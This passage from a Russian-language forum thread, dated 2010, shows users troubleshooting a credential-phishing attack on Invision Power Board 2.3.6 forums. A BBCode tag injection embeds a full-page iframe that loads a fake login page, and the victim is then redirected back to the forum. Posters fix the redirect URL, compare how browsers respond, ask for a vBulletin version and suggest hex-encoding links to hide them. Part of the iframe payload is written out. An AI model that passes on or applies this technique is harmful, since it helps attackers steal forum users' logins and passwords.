[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру/forum/index.php?act=Login&CODE=00
То поправь на
[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру/forum/index.php
И все должно получиться.
wagan
10.07.2010, 18:47
Возможно когда ты просматиривал сообщение в форуме когда тя перебрасывало ты был незалогинен на форуме.
Фишка работает когда ты залогинен на форуме и просматриваеш сообщение под своим профилем и тя перебросило на фейк. Тогда ты водиш пароль и логин и тя снова бросает на форум где ты уже до того залогинен.
Думаю проблема в этом.
Был залогинен.
Ты в скрипте посмотри куда стоит редирект.
Если так:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру/forum/index.php?act=Login&CODE=00
То поправь на
[Ссылки могут видеть только зарегистрированные и активированные пользователи]сайт.ру/forum/index.php
И все должно получиться.
Точно))
Libert
12.07.2010, 13:47
Ребят, вот что вылетает вместо переадресации
<****** src=[Ссылки могут видеть только зарегистрированные и активированные пользователи]адресфейка/ frameborder=0 width=100% height=100% scrolling=no>
IPB 2.3.6 тег работает, фейк работает, с переадресацией ****ь какая-то=(
Кстати на IPB 3 не пашет, пробывал на трех форумах
Добавлено через 6 минут
ах да, вот сам текст:
Здесь могла быть ваша реклама_[/acronym]
Потом пробывал и это:
][/acronym]
После каждой попытки чистил куки и всё-равно не переадресовывает
IE 8 не сработал
Opera 10.60 <****** src=[Ссылки могут видеть только зарегистрированные и активированные пользователи]адресфейка/ frameborder=0 width=100% height=100% scrolling=no>
Firefox 4.01 и 3.6 то-же что и с оперой, если кто сталкивался, обьясните что не так
Добавлено через 7 часов 4 минуты
сорри, не посмотрел первое сообщение до конца, заменил звёздочки-пашет, автору плюс огромный, если кто сможет подкинуть код для булки(vbulletin) буду оч благодарен.
Хочу добавить, что лучше всего вместо текста ставить картинку вроде [img*][Ссылки могут видеть только зарегистрированные и активированные пользователи][/img*] (без звёздочек)
После лучше шифрануть ссылки в 16-тиричный вид можно в вебе на ха.кер.орг а можно самому [Ссылки могут видеть только зарегистрированные и активированные пользователи] тут есть исходник html для такого энкодера